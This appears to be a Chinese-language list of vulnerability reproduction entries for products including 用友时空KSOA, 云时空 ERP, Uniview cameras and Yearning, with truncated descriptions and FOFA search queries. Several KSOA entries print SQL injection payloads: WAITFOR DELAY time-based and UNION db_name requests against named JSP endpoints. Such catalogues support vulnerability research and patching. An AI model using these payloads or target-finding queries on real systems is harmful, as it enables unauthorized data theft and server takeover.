Y24-2云时空-社会化商业ERP系统-SQL 漏洞描述: 时空云社会化商业ERP service接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 网站
Y24-1云时空-社会化商业ERP系统-文件上传 漏洞描述: 时空云社会化商业ERP gpy接口处存在文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端上传任意文件,执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 网站图片: 网络测绘: fofa语法: FOFA:app=“
Y23-1宇视科技-视频监控-InformationLeakage 漏洞描述: 宇视(Uniview)高清网络摄像机存在信息泄露漏洞,攻击者可以通过解密泄露信息获取管理员账号密码,登陆后台控制整个系统,最终导致系统处于极度不安全状态。 网站图片: 网络测绘: fofa语法: FOFA:app=“un
Y22-14用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA接口 /kp/PreviewKPQT.jsp 接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 fofa语法: app=“用友-时空KSOA”
Y22-13用友-时空KSOA-SQL 漏洞复现: payload: GET /kp/fillKP.jsp?kp_djbh=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) A
Y22-12用友-时空KSOA-SQL fofa语法: app=“用友-时空KSOA” 漏洞复现: 延时5秒 payload: GET /kp/PrintZPZP.jsp?zpshqid=1';WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 Host: User-Agent: M
Y22-11用友-时空KSOA-SQL fofa语法: app=“用友-时空KSOA” 漏洞复现: 查询第一个数据库名称 payload: GET /kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,db_name(1),4,5,6,7,8,9,10,11,
Y22-10用友-时空KSOA-SQL fofa语法: app=“用友-时空KSOA” 漏洞复现: 延时3秒,执行2次 payload: GET /kp/PrintZPFB.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1 Host
Y22-9用友-时空KSOA-SQL 漏洞复现: 延时5秒,执行2次 payload: GET /kp/PrintZP.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 Host: User-Agent: Mozilla/5.0
Y22-8用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务
Y22-7用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标
Y22-6用友-时空KSOA-文件上传 漏洞描述: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞
Y22-4用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标
Y22-5用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标
Y22-3用友-时空KSOA-SQL 漏洞描述: 用友时空OA(OfficeAnywhere)是用友软件推出的办公自动化产品,支持移动办公,提供强大的工作流引擎、协同办公工具、信息管理、日程和会议管理等功能,旨在帮助企业提高工作效率、促进团队合作,同时注重数据安全和权限管理。产品特性可能会因版本和更
Y22-2用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及
Y22-1用友-时空KSOA-SQL 漏洞描述: 用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标
Y21-1亿华-考勤管理系统-文件上传 漏洞描述: 亿华考勤系统是一款专业的人力资源管理软件,旨在帮助企业高效管理员工考勤情况。该系统提供了多种功能和特性,以确保准确记录和管理员工的出勤、请假、加班等情况。 网站图片: 网络测绘: fofa语法: body=“/api/shengcheng_img.
Y20-1Yearning-MysqlSQL审核平台-任意文件读取 漏洞描述: Yearning 2.3.1 版本、Interstellar GA 2.3.2 版本 和 Neptune 2.3.4 - 2.3.6 版本存在安全漏洞,该漏洞源于存在一个任意文件读取漏洞。攻击者可以利用该漏洞获取敏感信息
Y19-6用友-移动管理系统-文件上传 漏洞描述: 用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadIcon接口存在任意文件上传漏洞,
